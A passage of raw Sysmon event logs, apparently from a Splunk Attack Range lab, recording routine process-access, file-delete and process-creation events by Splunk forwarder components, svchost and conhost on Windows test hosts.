Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB8829621A7ACF9ED2B69F896234674F,SHA256=11CFEC1316833B26DBFD190EDC6D800B88154A9E99D4FBE23C4E8CDE9438BBF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:25.643{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3BE8B055691F5BBCD7FC876F8C4BEA,SHA256=55974BFD5E01E53710DBA4517B81ADFCB9D337A73B11065293D986CBE600DF1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5A9-60EB-9179-00000000D001}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5A9-60EB-9179-00000000D001}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5A9-60EB-9179-00000000D001}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.534{0C1E0330-F5A9-60EB-9179-00000000D001}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=197F1AFF992C7364ADD3FCE246A44222,SHA256=AAF7901CAC38A586C7BC07FC31753CA51A597F8AF6337E4D71EE8DCBF53C9703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4983F6A885320869D494F5F2E33196BC,SHA256=51628AA4F2E356C69B955E88424F428DCED52C1B9EA0E378D64668C09BFF1E1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.987{0C1E0330-F5AA-60EB-9379-00000000D001}26683788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5AA-60EB-9379-00000000D001}2668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.784{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F5AA-60EB-9379-00000000D001}2668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 